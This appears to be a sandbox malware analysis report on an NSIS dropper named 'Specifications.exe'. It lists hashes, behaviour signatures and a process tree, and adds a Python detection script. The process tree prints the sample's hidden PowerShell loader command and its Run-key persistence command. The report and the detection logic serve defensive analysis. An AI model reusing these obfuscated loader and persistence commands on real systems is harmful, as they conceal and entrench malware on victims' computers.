Analysis
max time kernel: 145s
max time network: 146s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 17/06/2024, 11:36
Static task: static1
Behavioral task: behavioral1
  Sample: Specifications.exe
  Resource: win7-20240508-en
Behavioral task: behavioral2
  Sample: Specifications.exe
  Resource: win10v2004-20240611-en
General
Target: Specifications.exe
Size: 757KB
MD5: 1724bf93af4c371ce30369f59b3b43bf
SHA1: 555106c85d133a1362904317afdae88e8c8d6b43
SHA256: b26fa277f86ce0b561cd4c563fc0e2a44623fdc0ad0cf97d6222537937df50f4
SHA512: fa2747830e3b7e0ca2ba9d8288e721ec96cf73608ba40787309b84ef4797a89f618613d2734b7a1850bfaa961da9ebb9f606e90c61c241c92d564bd7ad9f7df6
SSDEEP: 12288:5FRwba0Ugzh4BIUFPefhPh7kwIpur5QF/gtVIhodF8NBQX4A/cORo:KOLgrUFEhPh7kNpDF/goKdyNBNA/c
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Runs PowerShell with its display window hidden.
  pid 1996 powershell.exe
- Loads dropped DLL (2 IoCs)
  pid 1996 powershell.exe
  pid 3036 immeritoriously.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\Tekknet = "%Fremdateret% -windowstyle minimized $lowy=(Get-ItemProperty -Path 'HKCU:\\Anthrapyridine\\').Antialbumin;%Fremdateret% ($lowy)"
  Process: reg.exe
- Drops file in System32 directory (1 IoC)
  File opened for modification: C:\Windows\SysWOW64\Synergastic\oprejsningers.for
  Process: Specifications.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  pid 1996 powershell.exe
  pid 3036 immeritoriously.exe
- Suspicious use of SetThreadContext (1 IoC)
  PID 1996 powershell.exe set the thread context of PID 3036 (procid_target 32)
- Drops file in Windows directory (2 IoCs)
  File opened for modification: C:\Windows\resources\0409\preadvisable\dorsolateral.ini
  File opened for modification: C:\Windows\resources\0409\Fordunkles\glaikit.pup
  Process: Specifications.exe (both)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- NSIS installer (2 IoCs)
  behavioral1/files/0x000f00000001226c-18.dat matched yara rule nsis_installer_1
  behavioral1/files/0x000f00000001226c-18.dat matched yara rule nsis_installer_2
- Modifies registry key (1 TTP, 1 IoC)
  pid 2580 reg.exe
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  pid 1996 powershell.exe (8 occurrences)
- Suspicious behavior: MapViewOfSection (1 IoC)
  pid 1996 powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege, pid 1996 powershell.exe
- Suspicious use of WriteProcessMemory (22 IoCs)
  PID 1576 Specifications.exe wrote to memory of 1996 (procid_target 28): 4 times
  PID 1996 powershell.exe wrote to memory of 2792 (procid_target 30): 4 times
  PID 1996 powershell.exe wrote to memory of 3036 (procid_target 32): 6 times
  PID 3036 immeritoriously.exe wrote to memory of 2516 (procid_target 33): 4 times
  PID 2516 cmd.exe wrote to memory of 2580 (procid_target 35): 4 times
Processes
C:\Users\Admin\AppData\Local\Temp\Specifications.exe (PID 1576)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Specifications.exe"
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1996)
    Command line: "powershell.exe" -windowstyle hidden "$Skfulds175=Get-Content 'C:\Users\Admin\AppData\Local\hotdoggen\Bulkcarrieren.Hou';$Mesenteronic=$Skfulds175.SubString(54610,3);.$Mesenteronic($Skfulds175)"
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (PID 2792)
      Command line: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
    C:\Users\Admin\AppData\Local\Temp\immeritoriously.exe (PID 3036)
      Command line: "C:\Users\Admin\AppData\Local\Temp\immeritoriously.exe"
      - Loads dropped DLL
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\cmd.exe (PID 2516)
        Command line: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tekknet" /t REG_EXPAND_SZ /d "%Fremdateret% -windowstyle minimized $lowy=(Get-ItemProperty -Path 'HKCU:\Anthrapyridine\').Antialbumin;%Fremdateret% ($lowy)"
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\reg.exe (PID 2580)
          Command line: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tekknet" /t REG_EXPAND_SZ /d "%Fremdateret% -windowstyle minimized $lowy=(Get-ItemProperty -Path 'HKCU:\Anthrapyridine\').Antialbumin;%Fremdateret% ($lowy)"
          - Adds Run key to start application
          - Modifies registry key
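Two behaviours in the process tree above are worth turning into detection logic: the hidden PowerShell on PID 1996, which reads a data file, slices a three-character command name out of it at offset 54610 (the report does not show the token; Invoke-Expression's alias iex is the usual candidate) and dot-invokes it on the file's own content, and the REG ADD on PIDs 2516/2580, which stores a REG_EXPAND_SZ Run value that begins with an unexpanded %Fremdateret% variable (so the value itself never names powershell.exe) and reads its real body back from HKCU:\Anthrapyridine\ at logon. The report does not show where %Fremdateret% is defined, so the check below flags any non-standard variable in that position. This is an added example, not part of the sandbox report: the event records are constructed from the PIDs and command lines listed above, and the field names (pid, ppid, image, cmdline) and the root process's parent PID are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Run-key command as shown on the cmd.exe and reg.exe nodes of the process tree.
REG_ADD_RUN = (
    r'REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tekknet" '
    r'/t REG_EXPAND_SZ /d "%Fremdateret% -windowstyle minimized '
    r'''$lowy=(Get-ItemProperty -Path 'HKCU:\Anthrapyridine\').Antialbumin;%Fremdateret% ($lowy)"'''
)

# Constructed from the report's process tree; the root's parent PID 1000 is an assumption.
EVENTS = [
    ProcEvent(1576, 1000, r"C:\Users\Admin\AppData\Local\Temp\Specifications.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\Specifications.exe"'),
    ProcEvent(1996, 1576, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'''"powershell.exe" -windowstyle hidden "$Skfulds175=Get-Content 'C:\Users\Admin\AppData\Local\hotdoggen\Bulkcarrieren.Hou';$Mesenteronic=$Skfulds175.SubString(54610,3);.$Mesenteronic($Skfulds175)"'''),
    ProcEvent(2792, 1996, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"'),
    ProcEvent(3036, 1996, r"C:\Users\Admin\AppData\Local\Temp\immeritoriously.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\immeritoriously.exe"'),
    ProcEvent(2516, 3036, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\System32\cmd.exe" /c ' + REG_ADD_RUN),
    ProcEvent(2580, 2516, r"C:\Windows\SysWOW64\reg.exe", REG_ADD_RUN),
]

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
SLICED_NAME = re.compile(r"\.SubString\(\s*\d+\s*,\s*\d+\s*\)", re.I)  # $x.SubString(off,len)
DYNAMIC_CALL = re.compile(r"[.&]\s*\$\w+\s*\(")                         # .$name(...) or &$name(...)
REG_ADD = re.compile(r"\breg(?:\.exe)?\s+add\b.*\\CurrentVersion\\Run\b", re.I)
DATA_ENV_PREFIX = re.compile(r'/d\s+"?(%[^%\s]+%)', re.I)               # /d "%VAR% ..."
REG_READBACK = re.compile(r"Get-ItemProperty\s+-Path\s+'([^']+)'\)\.(\w+)", re.I)
# Variables a legitimate Run value plausibly starts with; anything else is suspect.
STANDARD_VARS = {"%SYSTEMROOT%", "%WINDIR%", "%PROGRAMFILES%", "%PROGRAMFILES(X86)%",
                 "%APPDATA%", "%LOCALAPPDATA%", "%USERPROFILE%", "%PROGRAMDATA%",
                 "%PUBLIC%", "%SYSTEMDRIVE%", "%COMSPEC%"}


def check_powershell_loader(ev):
    """Hidden PowerShell that reads a non-.ps1 file and invokes a command whose
    name is a substring of that file (the pattern on PID 1996)."""
    if not ev.image.lower().endswith("powershell.exe") or not HIDDEN_WINDOW.search(ev.cmdline):
        return None
    if "Get-Content" in ev.cmdline and SLICED_NAME.search(ev.cmdline) and DYNAMIC_CALL.search(ev.cmdline):
        src = re.search(r"Get-Content\s+'([^']+)'", ev.cmdline)
        return {"rule": "powershell_sliced_invoke", "pid": ev.pid,
                "script_file": src.group(1) if src else None}
    return None


def check_run_key_env_stager(ev):
    """REG ADD into a Run key whose data starts with an unexpanded, non-standard
    environment variable and pulls its body out of another registry value."""
    if not REG_ADD.search(ev.cmdline):
        return None
    var = DATA_ENV_PREFIX.search(ev.cmdline)
    if var is None or var.group(1).upper() in STANDARD_VARS:
        return None
    return {"rule": "run_key_env_stager", "pid": ev.pid, "env_var": var.group(1),
            "expand_sz": "REG_EXPAND_SZ" in ev.cmdline.upper(),
            "registry_readback": REG_READBACK.findall(ev.cmdline)}


def lineage(events, pid):
    """Parent chain for a PID as image basenames, root first."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid].image.rsplit("\\", 1)[-1])
        pid = by_pid[pid].ppid
    return chain[::-1]


def triage(events):
    """Run every check over every event and attach the process lineage to each hit."""
    findings = []
    for ev in events:
        for check in (check_powershell_loader, check_run_key_env_stager):
            hit = check(ev)
            if hit:
                hit["lineage"] = lineage(events, ev.pid)
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The Run-key check deliberately fires on the cmd.exe wrapper as well as on reg.exe, since either event alone is enough to see the persistence write; the lineage on the reg.exe hit gives the full Specifications.exe → powershell.exe → immeritoriously.exe → cmd.exe → reg.exe chain that ties the persistence back to the NSIS dropper.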
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 53KB
  MD5: f9cfb3763d8507c5f1c448cfdbe34957
  SHA1: eed922ec7b79a7a7cbd9932c9114ebfee0056744
  SHA256: e9b9d717a2185eef8a258e01429768017d26d6167cb62084c241b9b982fb64d4
  SHA512: 06f9c3e6f24b06e19a0fa3cc5b933934cdf3e62d4f5510ae3bedcc9938837fdcdfcead02fe4de8a89893f7ccd3dd402c1c8456c65319f2562619b9229d16853f
- Filesize: 319KB
  MD5: ac1b87f114afc3a08241f726d236e294
  SHA1: 3015700d1c89f76664d0a6ac7004f741e41e6d5f
  SHA256: a9b56415b6be3bea2c53c028197e668348bbff6b6fe2d8ed2f69b811fe8ee759
  SHA512: b90c4bedcc75a748692326fa89b2b02f797f6b34f3a5a665d552c67b13ce9e55b21fa0587aaeb02ba055b10938e6e45e2e45bf42a64b8af999d46138f92bb27d
- Filesize: 757KB (the submitted sample; hashes match the General section)
  MD5: 1724bf93af4c371ce30369f59b3b43bf
  SHA1: 555106c85d133a1362904317afdae88e8c8d6b43
  SHA256: b26fa277f86ce0b561cd4c563fc0e2a44623fdc0ad0cf97d6222537937df50f4
  SHA512: fa2747830e3b7e0ca2ba9d8288e721ec96cf73608ba40787309b84ef4797a89f618613d2734b7a1850bfaa961da9ebb9f606e90c61c241c92d564bd7ad9f7df6